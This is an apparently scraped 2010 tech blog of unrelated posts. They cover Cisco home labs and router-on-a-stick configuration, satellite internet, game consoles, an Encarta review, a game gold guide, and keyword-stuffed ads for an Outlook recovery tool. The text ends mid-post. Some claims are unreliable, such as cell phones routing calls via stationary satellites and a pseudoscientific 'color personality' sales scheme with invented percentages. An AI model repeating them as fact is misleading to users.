Cyber Avans

Assembling Your Cisco Home Lab

2010-10-24T20:44:00.002-05:00

A CCNA or CCNP candidate who wants to be totally prepared for their exams is going to put together a home lab to practice on. With used Cisco routers and switches more affordable and plentiful then ever before, there's really no excuse to not have one!

With the many different models available, there is some understandable confusion among future CCNAs and CCNPs about which routers to buy and which ones to avoid. You can take almost any set of Cisco routers and put together a home lab; part of the learning process is taking what equipment you have available and putting together your own lab! For those of you preparing to start your home lab or add to your existing one, this article will list the routers I use in my Cisco pods. You certainly don't have to have all this equipment, but this will give you some good ideas on how to get started.

The most versatile router you can get for your CCNA / CCNP home lab is a 2520. These routers come with four serial ports, one ethernet port, and one BRI interface for ISDN practice. This mix of interfaces means you can actually use it as a frame relay switch while using the ethernet and BRI ports for routing. (There is no problem with using a lab router as both your frame relay switch and a practice router; for a frame relay switch sample configuration, visit my website!)

My pods consist of five routers and two switches, and three of the five routers are 2520s, due to their versatility. A recent ebay search showed these routers selling for $99 - $125, an outstanding value for the practice you're going to get.

I also use 2501s in my home labs. These have fewer interfaces, but the combination of two serial interfaces and one ethernet interface allows you to get plenty of practice.

A combination that works very well is using three 2520s; one as my dedicated frame relay switch, one as R1, and another as R2. Add a 2501 as R3, and you can have a frame cloud connecting R1, R2, and R3, a direct serial connection between R1 and R3, an Ethernet segment that includes all three routers, and an ISDN connection between R1 and R2 if you have an ISDN simulator. That combination will allow you to get a tremendous amount of practice for the exams, and you can always sell it when you're done!

2501s are very affordable, with many in the $50 range on ebay. It's quite possible to get three 2520s and one 2501 for less than $500 total, and you can get most of that money back if you choose to sell it when you're done.

With four routers to work with, you're probably going to get tired of moving that console cable around. An access server (actually a Cisco router, not the white boxes we tend to think of when we hear "server") will help you out with that. An access server allows you to set up a connection with each of your other routers via an octal cable, which prevents you from moving that console cable around continually. For an example of an access server configuration, just visit my website and look in the "Free Training" section.

Access server prices vary quite a bit; don't panic if you do an ebay search and see them costing thousands of dollars. You do NOT need an expensive access server for your CCNA / CCNP home lab. 2511s are great routers to get for your access server.

One question I get often from CCNA / CCNP candidates is "What routers should I buy that I can still use when I'm ready to study for the CCNP?" The CCIE lab changes regularly and sometimes drastically when it comes to the equipment you'll need. During my CCIE lab studies, I found that renting time from online rack rental providers was actually the best way to go. Don't hesitate when putting your CCNA / CCNP home lab together, wondering what will be acceptable for the CCIE lab a year or so from now. None of us know what's going to be on that equipment list, so get the CCNA and CCNP first - by building your own Cisco home lab!

Technology and Wireless Satellite Internet

2010-10-24T20:43:00.002-05:00

As technology advanced forward, many of the things we've taken for granted for years are being reborn under the banner of wireless or wireless satellite Internet. Of course, we're talking about a lot more than just receiving the Internet from a satellite connection. Many other technologies have also obtained new life through the use of "sky birds."

Some of the most visible changes in technologies has been in communications and entertainment. Cellular telephones use satellite services to bounce signals literally around the world. Although cell phone service is typically within a 2 mile radius of a cellular tower, by using the power of stationary satellites, a signal or connection on a cell phone can be routed to wherever another cell tower can be found. This is especially good news for those people who tend to be in more remote areas.

Wireless satellite Internet is a connection to the web that's available anywhere the sky can be seen. Using a satellite to make the connection into the web holds the promise of all the web all the time, anytime. The always on no matter where you are can be a major benefit for many people. This feature is especially promising for serious followers of sports, sport teams, news, weather junkies, stock reports, etc. Imagine anytime, all the time, whenever there's a computer to be able to log into you Internet connection using wireless satellite Internet services.

Another technology that falls under the umbrella of wireless satellite Internet is the whole television genre. Companies like Direct Way and Dish Network are rapidly building infrastructure that replaces traditional antennae or cable television reception options. For about the same price as cable-TV a clear view of the southern sky will deliver crystal clear television with all popular channels.

Movies on Demand is an up and coming technology that will literally allow you to order movies to watch whenever you want. No more being tied to the start times of the networks, cable companies or even the satellite entertainment providers. All movies, whenever, all the time is the driving force behind the wave of growth in this fast paced industry.

Choosing a Video Game System

2010-10-20T22:52:00.000-05:00

In the old days, choosing a video game system for children wasn't all that hard. After all, parents didn't have to worry about games carried by systems like Atari (there was nothing threatening about Pac-Man or Space Invaders). Today, however, with the proliferation of games with mature content available on games supported by the major system manufacturers, parents want to know which system carries the most kid-friendly games, ones that the young ones will enjoy and one that parents will not regret spending money on.

Let's start with the Sony PlayStation 2, the best-selling game console on the market today. There are literally thousands of titles available for this system, which cater to every age range. There are approximately 600 games for the PS2 that have the "E" rating, meaning that it is suitable for players ages six and above. However, many of these games are too complicated for young children to play. Games that children ten years old and above can enjoy are rated E10+, while those that are rated EC (Early Childhood) are of course, suitable for the very young. The PS2 carries about a dozen E10+ games, including movie-based titles like Shrek Super Slam for PlayStation 2 and Chicken Little. EC titles that little ones can enjoy include Dora the Explorer: Journey to the Purple Planet, Eggo Mania and At the Races Presents Gallop Racer.

Nintendo's GameCube console continues to be popular because it carries titles that are popular with children. The Entertainment Software Rating Board (ESRB) lists 263 video game titles rated E for the GameCube, and these include some of the most popular and beloved among the children of today and years past, such as Sega's Sonic GEMS Collection, Nintendo's own Mario Party 6 and Mario Tennis. The Legend of Zelda series and several Pokemon titles are available exclusively on the GameCube as well.

Microsoft's Xbox and Xbox 360 video game consoles likewise have many, many titles that are rated E; the Xbox with approximately 270 games and the Xbox 360 with so far about a dozen -- but count on the number of Xbox 360 titles to increase since it's a new release. Some games published by Microsoft exclusively for the Xbox and the Xbox 360 and which have the E rating are Astropop and Feeding Frenzy. However, remember that most game publishers release crossover titles, or games that are available on multiple platforms. For instance, Eidos Interactive's LEGO Star Wars (rated E) is available for the GameCube, PS2 and Xbox; Activision's Madagascar (rated E10+) is available on the same platforms, while Global Star Software's Dora the Explorer (rated EC) is available on the PS2 and Xbox, but not on the GameCube.

What about parental control options? Among the four systems, the Xbox and the Xbox 360 have the most efficient parental lock functions. Parents are able to set limits on the games and films to be played on the systems. If you set the system to play only E-rated games, kids won't be able to play DVD's or games that have Teen, Mature, or Adults Only ratings. The GameCube also has a parental lock feature, albeit a less effective one. Users note that all it does is tone down certain effects that might be troubling for children (for example, the amount of blood seen in games) but do not block the playing of games at all. It doesn't even screen or bleep offensive language. The parental control function of the PlayStation 2 is even worse -- it doesn't allow parents or anyone to restrict access to video games at all. The most parents can do is to set the PS2 to prevent their kids from watching DVD movies with inappropriate content.

When it comes to price, the GameCube comes out tops. Available for only $99, it's significantly cheaper than the PlayStation 2 and Xbox, whose prices range from $150 to $199 (or more if bundled with game titles). The Xbox 360, being the newest of the bunch, is the highest-priced. For $299, you get the system and a wired controller. For $399, you get a wireless controller, a headset that players can use to talk to other people online, a 20 GB hard drive that is loaded with game-related videos and music, and a remote.

Parents should go out and try each system personally as well as look at the different titles available for them before deciding which one to buy. Factors such as number and age of users at home, game title availability, and budget should also be considered. Each system has its own pros and cons, and families will differ in their preferences: some will be content with the limited but popular games of the GameCube; some might prefer the wider offering of the PlayStation 2 or the Xbox; others might opt for the high-tech features of the Xbox 360. But all things considered, making the right choice will provide hours of wholesome, fun, and worry-free entertainment for the little ones and for their parents as well.

OST to PST convertor

2010-10-05T21:30:00.002-05:00

Besides mailbox recovery, Recovery Toolbox for Outlook is an easy way to convert the data. For example, if your mailbox is stored on Microsoft Exchange Server, it is not accessible offline, from your home PC. Now you have a solution, Recovery Toolbox for Outlook can easily convert OST format to files with PST extension, that can be opened offline.

PST files may be burned to a CD or forwarded to any other PC within your local network, there are no restrictions with this. Now your mailbox does not depend on your mail server, PST files may be backed up to any removable media, this measure will be a good addition to other measures that should protect your PC. Try Recovery Toolbox for Outlook and enjoy an effective tool for file conversion, convert ost pst and convert .ost to .pst, demo version of this program for ost pst conversion and ost to pst is available for free.

Documents and instructions are not needed, in the most cases, OstToPst conversion is performed by all users from the first attempt.

How to convert .ost to .pst? However, our engineers are ready to respond all requests with regard to ost recovery, ost to pst conversion and convert ost to pst within 24 hours. Feel free to forward us your opinion with regard to Recovery Toolbox for Outlook and osttopst, it is very important for us. All emails are carefully reviewed by support department and within reasonable time. You can also compare Recovery Toolbox for Outlook with other data conversion solutions. An innovative data conversion engine features considerable benefits with other programs. Recovery Toolbox for Outlook ost to pst converter works with all supported versions of Microsoft Outlook and Microsoft Windows.

Beginner's Final Fantasy XI Gil Guide

2010-10-01T20:47:00.000-05:00

Having enough FFXI Gil is the most essential aspects of the game. Gil the major currency used when purchasing or trading items. To be a good player you will need allt he Gils you can get. No matter how great your game skills are you will need the Gils to get your equipments, armors, weapons and other items. Having the gears early in the game will help you advance to higher levels at a faster pace than others can. Here are some good tips to start your career in Final Fantasy XI.

Warp Quest
This method can get you about 10k gil within an hour. You need to start with 1k to purchase a slime oil. After you've purchased the slime oil, bring it to an NPC named "Unlucky Rat" in the Metal district of Bastok in exchange for a warp scroll. The scroll sells for about a good 7-10K. Seems easy? Well slight problem with this method is that you will need to have enough fame built up before the NPC will take your slime oil. You will be required to run around town doing low level missions to get your fame up. This is where it gets a little time consuming but 10k gil an hour for a lowbie is really good. You can also redo this quest by creating a mule account and transfering 1k gil to that character.

Just Badge Quest
The Justice Badge quest is located in Winhurt and will require 1 rabab tail and 4 onions to complete. you can buy the stack of rabab tail in the auction house for 50-100gil. Easy to do at low level. In the docks of Winhurst you will find an NPC that you can give the rabab tail to. He will give you the Justice Badge which sells for 500-2000 gil in the auction house. After receiving the bad, give him 4 wild ionions and you'll receive a scroll that sells up to 5000 gil. You can repeat this quest by using a mule

Fire Crystals
A stack of first crystals can sell for 2000 gil easily over at the auction house. There are 2 good methods to collect fire crystals. The more commonly used method would be the usual beat the mob down and loot method. To start you need to be around level 7-10. You will need signet cast on you at your town gates. Head out North to Gusterburg where you will be able to find many vultures. You'll only want to kill the vulters and nothing else to conserve time. To the Northwest of San D'oria there is an area full of Orcs. The orcs drop a nice amount of fire crystals as well. You can probably average about 3 stacks in an hour. 6000 gil in an hour for a level 7-10 is not too bad.

The other method of farming fire crystals is by gardening. You start by buying a brass flower pot in the auction house, several vegetable seeds and some water crystals. You then plant the flower plot in your Mog house and put in the vegetable seeds. Feed it some water crystals, after 1-3 days you will have 17 fire crystals come out of it. You can have up to 6-8 flower pots per house, you can easily make 20-30,000 gils every 2-3 days. It only takes a few minutes to purchase the accessories and to plant them. It's a wealthy short term investment. Money growing on trees is the way I think of it.

Configuring And Troubleshooting Router-On-A-Stick

2010-09-17T02:51:00.001-05:00

For CCNA and CCNP candidates, it's hard not to laugh the first time you hear the phrase "router on a stick". Let's face it, that's a pretty silly term. But as those who have passed the CCNA and CCNP exams know, this is a vital exam topic that you must know how to configure and troubleshoot.

Basic Cisco theory states that for hosts in different VLANs to communicate, a Layer 3 device must be involved to handle the routing between the VLANs. That device is a router, and there are special considerations that must be taken into account for both the physical router itself and the configuration you'll be writing.

The router will be connected to a switch via a FastEthernet port (or higher). The router port cannot be a regular Ethernet port, since the router port will need the ability to send and receive data at the same time.

The configuration of the interface is where things get interesting. Let's say we have two VLANs that will be using router-on-a-stick to communicate.
Here is the VLAN information:

VLAN 20: 20.20.20.0 /24
VLAN 40: 40.40.40.0 /24

The port on the switch that will be connected to the router's FastEthernet port must be in trunking mode, and you must know the trunking protocol in use. We'll go with the Cisco-proprietary ISL here.

The physical FE port on the router will not have an IP address. The use of router-on-a-stick mandates the use of logical subinterfaces. While we don't have to use the VLAN numbers for the subinterface numbers, I've found this helps you keep the interfaces straight. One subinterface must be given an IP address in VLAN 20, and the other will have an IP address in VLAN 40

After creating subinterfaces fast 0.20 and fast 0.40, the config looks like this:

interface fastethernet0
no ip address
interface FastEthernet 0.20
ip address 20.20.20.1 255.255.255.0
interface FastEthernet 0.40
ip address 40.40.40.1 255.255.255.0

Believe it or not, you're almost done! Now we need the encapsulation statement under each subinterface. The subinterface statement must reflect both the VLAN number and the encapsulation type being used. When we're finished, the config would look like this:

interface fastethernet0
no ip address
interface FastEthernet 0.20
ip address 20.20.20.1 255.255.255.0
encapsulation isl 20
interface FastEthernet 0.40
ip address 40.40.40.1 255.255.255.0
encapsulation isl 40

And that's it! Your hosts in VLAN 20 should now be able to communicate with hosts in VLAN 40, and vice versa.

A couple of final troubleshooting points - the most common error with router-on-a-stick is to put the wrong vlan number in the encapsulation statement. Also, make sure you have configured the router's IP address in VLAN 20 as the default gateway for hosts in VLAN 20, and do the same for VLAN 40.

I hope you've enjoyed this look at router-on-a-stick. While the name may get a chuckle out of you, it's still used in quite a few networks out there, and knowing how to configure and troubleshoot it will get you that much closer to earning your CCNA and CCNP.

Encarta Premium 2006

2010-09-16T02:50:00.000-05:00

Microsoft was long derided by its critics for having failed to fully grasp the Internet revolution. It was late in developing Net technologies such as a proprietary search engine and in coping with security threats propagated through the Web.

Not any more. Earlier this year MSN rolled out a great search engine and now Microsoft has fundamentally revamped its reference products. By committing itself to this overhaul, Microsoft embraced reality: nine out of ten children (between the ages of 5 and 17) use computers (USA figures) - and 85% of these get their information online.

The Microsoft Encarta Premium 2006 is a breathtaking resource. It caters effectively (and, at $50, affordably) to the educational needs of everyone in the family, from children as young as 7 or 8 years old to adults who seek concise answers to their queries. It is fun-filled, interactive, and colorful.

The 2006 Encarta's User Interface is far less cluttered than in previous editions. Content is arranged by topics and then by relevancy and medium. Add to this the Encarta's Visual Browser and you get only relevant data in response to your queries. The Encarta Search Bar, which was integrated into the product two years ago, and is resident in the Task Pane even when Encarta is closed, enables users to search any part of the Encarta application (encyclopedia, dictionary, thesaurus, etc).

The Encarta's new Web Companion is a (giant) step in the right direction. It obtains search results from all the major search engines without launching any additional applications (like a browser). Content from both the Encarta and the Web is presented side by side. This augmentation explicitly adopts the Internet and incorporates it as an important source of reference.

It may raise important and interesting issues of intellectual property, though. Web content copyright-holders may demand royalties from Microsoft for the use it makes of their wares in its commercial products.

Encarta would do well to also integrate with new desktop search tools from Google, Microsoft, Yahoo, and others. Users should be able to seamlessly access content from all over - their desktop, their encyclopedias, and the Web - using a single, intuitive interface.

The Encarta Premium includes a dictionary, thesaurus, chart maker, searchable index of quotations, games, 32 Discovery Channel videos, 25,000 photos and illustrations, 2800 sound and audio clips, hundreds of maps and tables, and 400 videos and animations. It incorporates numerous third-party texts and visuals (including hundreds of newspaper articles and a plethora of Scientific American features).

The Encarta is augmented by weekly or bi-weekly updates and the feature-rich online MSN Encarta Premium with its Homework Help offerings. Unfortunately, the Encarta still conditions some of its functions - notably its research tools and updates - on registration with its Plus Club.

The Encarta is the most comprehensive, PC-orientated reference experience there is. No wonder it has an all-pervasive hold on and ubiquitous penetration of the child-to-young adult markets. Particularly enchanting is the Encarta Kids interface - an area replete with interactive quizzes, pictures, large icons, hundreds of articles, and links to the full version of the Encarta. A veritable and colorful sandbox. Those kids are going to get addicted to the Encarta, that's for sure!

Encarta actively encourages fun-filled browsing. It is a riot of colors, sidebars, videos, audio clips, photos, embedded links, literature, Web resources, and quizzes. It is a product of the age of mass communication, a desktop extension of television and the Internet.

Inevitably, in such a mammoth undertaking, not everything is peachy. A few gripes:

Regrettably, installation is not as easy as before. The Encarta 2006 makes use of Microsoft's .Net technology. As most home computers lack it, the installer insists on adding it to the anyhow bloated Windows Operating System. There is worse to come: the .Net version installed by Encarta 2006 is plagued with security holes and vulnerabilities. Users have to download service packs and patches from Windows Update if they do not wish to run the risk of having their computers compromised by hackers.

Fully installed, the Encarta Premium 2006 gobbles up more than 3.5 Gb. That's a lot - even in an age of ever cheaper storage. Most homesteads still sport PCs with 20-40 Gb hard disks. This makes the Encarta less suitable for installation on older PCs and on many laptops. Despite the hype, relatively few users possess DVD drives (but those who do, find the entire encyclopedia available on one DVD).

The Encarta DVD 3-D tours have improved but they still hog computer resources and are essentially non-interactive. Is it worth the investment and the risk to the stability and performance of the user's computer?

The Encarta tries to cater to the needs of challenged users, such as the visually-impaired - but is still far from doing a good job of it.

The atlas, dictionary, and thesaurus incorporated in the Encarta are outdated. Why not use a more current - and dynamically updated - offering? What about dictionaries for specialty terms (medical or computer glossaries, for instance)? The Encarta's New English Dictionary dropped a glossary of computer terms it used to include back in 2001. All's the pity.

But that's it. Encarta is a must-buy (especially if you have children). The Encarta is the best value for money around and significantly enhances you access to knowledge and wisdom accumulated over centuries all over the world. The amount and quality of content squeezed into a $50 package (before rebate) defies belief. I am a 44 years old adult but when I received my Encarta Premium 2006, I was once more a child in a land of wonders. How much is such an experience worth to you?

The Convenience Of An All In One Printer

2010-09-14T22:30:00.000-05:00

Most people don't like to have a boss, but not everyone can work on their own. But working from home can be fairly expensive. Anyone who has worked from home can attest to the high cost of home office equipment. Standard office equipment includes a fax machine to send and receive documents quickly, a copier for making multiple copies of paperwork, a scanner for uploading information, and a printer for a variety of paperwork-related tasks. Adding them all up can hit you hard in the wallet and clog up your workspace. Luckily for anyone with a home office, there is a simple solution: an all-in-one printer.

The greatest advantage of the all-in-one printer is that it integrates three sizable machines into one conveniently-sized device. The all-in-one printer can fit easily on the surface of a desk or shelf, freeing up surface space for other things. Installing the printer's software is simple to do, with easy step-by-step instructions to guide you through the process. Finding an all-in-one printer is as effortless as a quick trip to an electronics store like Best Buy, Circuit City, or Radio Shack.

Alternatively, you can shop online to find an all-in-one printer that's right for you. With so many currently available on the market, the competition between brands has made the prices fall greatly. Some reliable online stores include http://geeks.com, http://newegg.com and http://amazon.com. Each of these online businesses can offer product warranties that will protect your all-in-one printer from an early demise.

All-in-one printers usually sell for one hundred dollars or less, so the cost of the machine makes it a very practical investment for any home office. The added work space that the all-in-one printer allows you makes the purchase even more practical, because it helps you maximize your office's usable space. The additional convenience of having three devices in one is yet another clear advantage of buying an all-in-one printer.

Some all-in-one printers come with bundled software that allows the printer to serve as a fax machine in addition to its printing, scanning and copying duties. Buying an all-in-one printer with faxing capabilities will cost a little more, but the added convenience of being able to send and receive documents from home can make the additional expense well worth it.

You can benefit from investing in an all-in-one printer, even if you don't work from home running your own business. These all-in-one printers are perfect for anyone wanting to scan and save family photographs, make copies of personal documents, or print letters and greeting cards. All-in-one printers are inexpensive too, especially when comparing it to the combined prices of all the separate devices. Adding up the ease and convenience of owning one device that performs a variety of tasks makes obtaining one a practical and fine investment.

What is Blogging??

2010-09-13T21:53:00.000-05:00

Blogging 101

If writing is an art, then, blogging is one way of using words to come up with an art. This is because people who are into blogging are the ones who are artistic on their own sense, carefully choosing words that would best describe their feelings, sentiments, wishes, desires, and everything.

Basically, blogs were first introduced as weblogs that refer to a "server's log file." It was created when web logging hit the virtual market. Since its inception in the mid-1990s, web logging gradually saturated the virtual community making the Internet a viable source of greater information.

However, with web logging, you still need a web site and domain names, but with blogging, you do not need anything just an account with blog providers. In most cases, these kinds of blogs are free of charge.

With the onset of blogging in the industry, personal journaling had been a common ground for people who wish to be known all over the world. However, not literally famous as this is not a case on being popular or well-known personality.

Generally, blogs are created for personal use. Like a journal, people can write their daily adventures, sentiments, and whatever ideas they want to express online.

Nevertheless, with the advent of the online businesses, blogs had gradually taken the limelight in providing businesses a chance to boost their productivity online. This is where the business blogs have taken the limelight.

Business blogs are, basically, created to advertise the services or products of a certain web site or online business in order to increase online sales.

Moreover, business blogs are also one way of promoting the company so that the other readers will know that a certain company exists online. With blogs, entrepreneurs are able to establish a name in the virtual market through articles that can be very useful in the reader's life.

From there, you can make money out of blogs by simply syndicating it to your business' web site. This can be done through the RSS technology.

So, if you are thinking to create a blog, whether for business or for pleasure, you need to know some tips that could help you get through and make your blog one of the interesting blogs online.

Here's how:

1. Consider your audience

Even if your blog is generally personal, still, it would be better to consider the minds of your readers. You have to think of something that would interest them.

After all, most of the reasons of people who write blogs are not at all confined to their own personal motives. Most of them would love to be "heard" (or read) and would love to be known, in some way or another, even for just a minute. Hence, it is very important to come with a write up that everybody can understand, not necessarily that these people can relate to it but they can understand it.

2. Pictures speaks a thousand words

To make your blogging worth the browsing effort of your readers, it would be extremely nice if you will put some pictures in it. It does not necessarily mean you have to place a picture of yourself. Any photographs will do as long as it does not pose danger or insult to anyone who will be reading your blog.

3. Make constructive and beneficial blogs

Even if you are free to write anything you wan to say to the world, still, it would be better to create some write-ups that would be beneficial to your readers.

After all, its information technology that you have there so better be inclined to provide information rather than sheer quirky entertainment.

4. Avoid making multifaceted and complicated blogs

In order to have an interesting blogs, try not to use some highly technical and highfalutin words. After all, it is not a science discourse or a debate that you are making, so better stick to simple facts and short blogs.

Bear in mind that most people who use the Internet usually do more scanning than scrutinizing each site word for word. Therefore, it would be better to come with blogs that will not bore your readers just because you have these lengthy articles.

5. Make it interactive

As much as possible and if your capacity will allow it, make your blog interactive. Yu can do this by placing some video or audio clips in your blog.

You can even place an area for comments or for some feedbacks. In this way, you can get some impressions or reactions of other people. Who knows, you might even gain some friends just by making them feel at home in your blog site.

Indeed, blogs are not created just for the mere fun of it. It also has its own purpose in the world of the Internet.
Therefore, for people who wish to harness their craft, as far as writing is concerned, blogs are the best way to do it.

As they say, blogging is the contemporary term of creative and commercial writing.

I Know What Color You Are

2010-09-12T22:21:00.002-05:00

There are 4 color personality types. Red, Blue, Green and Yellow.

In a nutshell knowing what the different color personalities people have means you'll understand people better then they understand themselves.

At this point this tells you nothing. No worries it didn't mean anything to me when I first heard about personality colors. But man I wish I knew about this years ago, it would have saved me a ton of aggravation.

Everybody has a color type. And with that color type we act in a certain way. Certain things are important to us. We like to be talked to in a certain way. We like and dislike certain things.

Take me for example. Lets say you were calling me as a potential prospect.

What if you knew how I liked to be talked to? Knew what was important to me. Knew what I didn't like. Knew what I liked. Knew if I was over sensitive. Knew if I needed support. Knew if I like to have fun.

Knew if I would be teachable. Knew if I was money motivated. Knew if I would be a leader. Knew if I was creative. Knew if I needed all the facts and figures.... I could go on and on.

What if you knew all this information and soooooooo much more about me after only talking to me (anyone) for only a few minutes and then gained more and more insight to me the longer you talked to me?

Do you think this would impact your business and your personal life in a positive way?

If I have to answer that for you...honestly click away and go play a video game you're just wasting your time. (Sorry about that I had some guy tell me he saw no value in this. Gee no wonder he's not achieving all the success he could be.)

But for everyone else who sees the power of this. Would you not agree you'd have an unfair advantage on everyone else?

I can give you a brief overview of the four different personality colors. There is much more to learn but this will give you a good idea of the power of knowing color personalities. (They're in no particular order)

First there is Yellow. Yellow's make up 35% of the population and are open and indirect with their feelings. They are the best at using both sides of their brains. They are relationship and family orientated, logical, analytical and teamwork is very important to them. Their voice is soft and gentle and speak in relaxed tones.

Yellows have jobs like teachers, social workers usually any nurturing job. They like giving back to others. They don't like pushy people, aggressiveness, sudden change or animal cruelty.

Some of their weaknesses are. They are over sensitive, take things personally and will buy other peoples excuses.

Talk to a yellow slowly and relaxed and let them know they are appreciated.

Next is Blue (that's me). Blues make up 15% of the population. Blues are open and direct with their feelings. Very right brained, talk fast, very creative, must have fun doing things. Strong on family and relationships, spontaneous and enthusiastic.

Blues have jobs like sales (of any kind), singer songwriter anything that is creative.

They don't like not having fun they don't like facts and figures or being sold.

Their weaknesses are being unorganized, scattered and poor savers.

When you talk to a blue focus on fun, talk about excitement. Never try to sell a blue.

Next is Greens. Greens make up 35% of the population. They are indirect and self-contained with their feelings. Right brained, very logical, and analytical. Precise and need to have all the facts and figures. They are savers. Organized, task orientated and accurate. Let's get the kids to college. And they're the best negotiators.

Some of their jobs include, engineers, accountants, CPA, professor. Anything to do with logic and reasoning.

They don't like pushy people. Not having all the facts and figures. Not being on time, aggressiveness. Get depressed easily and are hard to please.

Some of their weaknesses are, they over analyze everything (to death). Hard to please and pessimistic about everything.

When speaking to a green, give them the facts and figures. You cannot overload a green with information.

And finally the Reds. Reds make up 15% of the population. Reds are direct and self-contained with their feelings. Reds are right brained. Their slogan is "It's my way or the highway" Forceful, stern and to the point. No chitchat, money is power, take action. Task orientated, Impatient, un-teachable, show me the money.

Their jobs consist of being CEO's, Attorneys, military leaders, and president of the bank.

Reds do not like losing control, indecision, small talk or crying. They don't like talking about time freedom, family or vacations.

Some of their weaknesses are having a big ego, domineering and un-teachable.

When you talk to a red you need to let them think you need them. They like being sold, close them, focus on money, and stroke their ego. Talk about your leaders income.

Now everything I just outlined about the different color personalities is not a judgment it's who people are.

Just imagine if you had this information the next time you talked to a prospect? How do you think your next call would go?

Learn this skill so the next time you're talking to someone and they say something in a certain tone or way or ask you a question. You'll know exactly why they're acting the way they are and why they are asking the questions they do.

Instead of taking things personally or getting frustrated, you'll say to yourself "Hey you're suppose to act like that or say that because you're a green" (pick a color)

Master this one skill and your business life and personal life will skyrocket. Guaranteed!!!

Until Next Time.

To your success,
Duffy Rogan

Utilizing Online Printing Service

2010-09-07T00:34:00.002-05:00

Well, talking about advancement in technology, it is true that there are many new technologies have come out or shall I say became known. Due to this innovation or through the fast change in our technology there are many old technologies are also becoming obsolete. Old model technologies are fastly phasing out. Today our technologies are becoming faster with its service and better with its production.

One has the fastest change in technology is in printing industry. No doubts that there are many printing companies are competing to each other. Most of these printing companies have their own advance printing technology and services that can offer you. The choice is yours. It's up to you which company you will entrust your printing projects.

Due to the advancement, more printing companies are using the service of the internet to be able to connect to their clients fast. The internet opens more options especially in terms of providing printing services. Online printing is perfect for any business with publishing needs. With today's cutting edge technology, it is easier and more efficient than ever to produce high quality documents that reflect the class and integrity of your business establishment. Given the widespread use and utility of business printing services, it is important to look for unequaled, complete online printing options.

One of the reasons behind of this fast popularity of online printing is the fast start of broadband, but uploading a batch of prints at modem speed can be impossibly slow, whereas with a good internet service provider the process can be much speedier.

Online printing services are really providing a huge service for the business and professional world. Not only do they offer great prices on all kinds of printing, but a good number also provide excellent customer service and websites that list all of their prices. Some online printers offer free shipping as well, so you don't have to worry about that.

Wasting a lot of time waiting for your printing project to be done in a printing shop is over. Printing your promotional items, company paper and other business documents is easy as reaching your pc. Print online is a one stop shop and a place cards print online for all your printing projects with state of the art equipment, digital print online and experienced staff to accommodate all your printing needs.

Beware - Borders and Boundaries

2010-09-06T03:48:00.000-05:00

Have you ever had someone get right up in your face when they are talking to you? So close in fact that a letter "S' results in an unwanted shower? Often when we are out networking, we find ourselves in a loud environment as people try to talk louder to be heard over people trying to talk louder to be heard. This results in a roar that makes regular conversation difficult.

The temptation in this atmosphere is to get very close to another person so they can hear you and you them. This can result in being too close to another person sometimes making them very uncomfortable. This discomfort is heightened when we have been consuming alcohol and the person we are talking to have not.

Each of us has our own comfort zone boundary. This is a space around us that when another person enters we begin to feel uncomfortable. A good way to relate to this is to remember if you have ever had an argument where someone got right up in your face and possibly even pointed their finger very near to it. Remember how that made you feel? In most cases it makes a person feel more angry.

In a networking environment it is important to maintain a distance from a person that you are talking to. This distance should be almost an arms length. Most peoples comfort boundary is about the length of their arm. If you find yourself getting very close to someone in conversation, imagine if you raised your arm and that is the distance that you should be from the other person. If they move closer to you in the course of conversation, it is acceptable to them to be closer. If it is acceptable to you then continue with the conversation at that distance

You can sometimes tell if you are standing too close to someone if they seem to be moving back while you are talking to them. If they appear to be getting further away from you, do not move to be closer to them. They will stop when they reach the distance that they are comfortable with. If they turn and walk away of course it is time to find someone else to talk to.

To be most effective in your attempts to build relationships with others, it is most important to keep these things in mind. Remember that it makes no difference what you say to a person if they are not engaged in the conversation. Good observance of boundaries can give you the edge you need to make networking work.

Recover Damaged Mail and Data in Microsoft Outlook

2010-09-06T03:25:00.002-05:00

Microsoft Outlook is the de-facto standard for office communication. A typical office employee's entire workflow consists of tasks, contacts, and email exchange in Microsoft Outlook. But what happens if one day a system crash happens, or a hard drive fails, or some malware targets and corrupts your Outlook data? Does this mean the end of the day for your entire office?

Are you betting on the chance that corruption is unlikely to happen? Consider the following. In a typical office environment, Outlook PST and OST files that contain all email, tasks, appointments and contacts are the files accessed most frequently. Computers read and write to these files all the time during the working day, except for the lunch break. If there is one file that is likely to be damaged or corrupted during a power outage, that would be an Outlook storage container. If Windows crashes at the moment Outlook was accessing a PST or OST file, the corruption will occur almost inevitably. If that happens, Microsoft Outlook will not be able to access that data, and it will report a corrupt database.

Modern hard drives are made to barely survive through the warranty period. Chances of hard drive failure increase exponentially after about 3 years of use. Don't let a hard drive failure to get you unprepared!

Power outages, black-outs and brown-outs are becoming all too common. A UPS can save you from power outages, firewalls can protect against viruses and malware, and regular backups will get you back on track if the unpredictable happens. But what if the backup is a few days old, and you're in the middle of something important? What if you cannot afford to lose several days of work? Consider repairing the corrupt Outlook database to save you days of work!

Outlook has a built-in recovery mechanism. If Outlook detects corruption in a PST or OST file, it rejects the file automatically, not allowing you to continue your work.

Microsoft provides another level of recovery in the form of a special Inbox Repair Tool to recover corrupt databases called ScanPST.exe. It claims to recover corrupt Offline Folders (*.ost) and Personal Folders (.pst). Unfortunately, this level of data recovery can only cope with small problems, and frequently fails if more serious damage is done to the database. Even worse, sometimes its recovery attempt produces files even more damaged than the originals. Microsoft warns that using that tool can result in data loss.

If everything else fails, refer to a third-party solution such as Recovery ToolBox for Outlook http://www.recoverytoolbox.com/outlook.html. The product maximizes your chances of successful data recovery of your mailbox files with all email folders, tasks, appointments, contacts and any other data stored in the PST and OST files. Unlike many similar tools, Recovery ToolBox for Outlook can repair PST and OST files that are seriously damaged, and can even deal with the harsh consequences of running Microsoft ScanPST.

Recovery ToolBox for Outlook allows you to access PST and OST files directly, bypassing Microsoft Outlook completely. It implements its own algorithm of accessing Microsoft proprietary formats and optionally converting data into a set of regular .eml files. The toolbox is not limited to just data recovery, allowing you to convert your *.pst and *.ost files into a set of *.eml and *.vcf files, or convert *.pst files into *.ost format.

Download your copy from http://www.recoverytoolbox.com/outlook.html and keep it installed on all PCs in your office and at home to be able to get back to work instantly in case of an unpredictable event!

Recover Deleted Excel Spreadsheets

2010-09-04T03:47:00.002-05:00

Today, Microsoft Excel clearly possesses dominant market share in the spreadsheet product market. Its proprietary XLS format is compatible throughout the range of Microsoft Excel versions, and is a de facto standard at home and in the office. It is hard to overestimate the number of spreadsheets and the amount of important data stored in XLS files all over the world. But what if your computer's hard drive fails and you lose access to all spreadsheets? Or what if you simply delete an XLS spreadsheet on which you've spent hours of work?

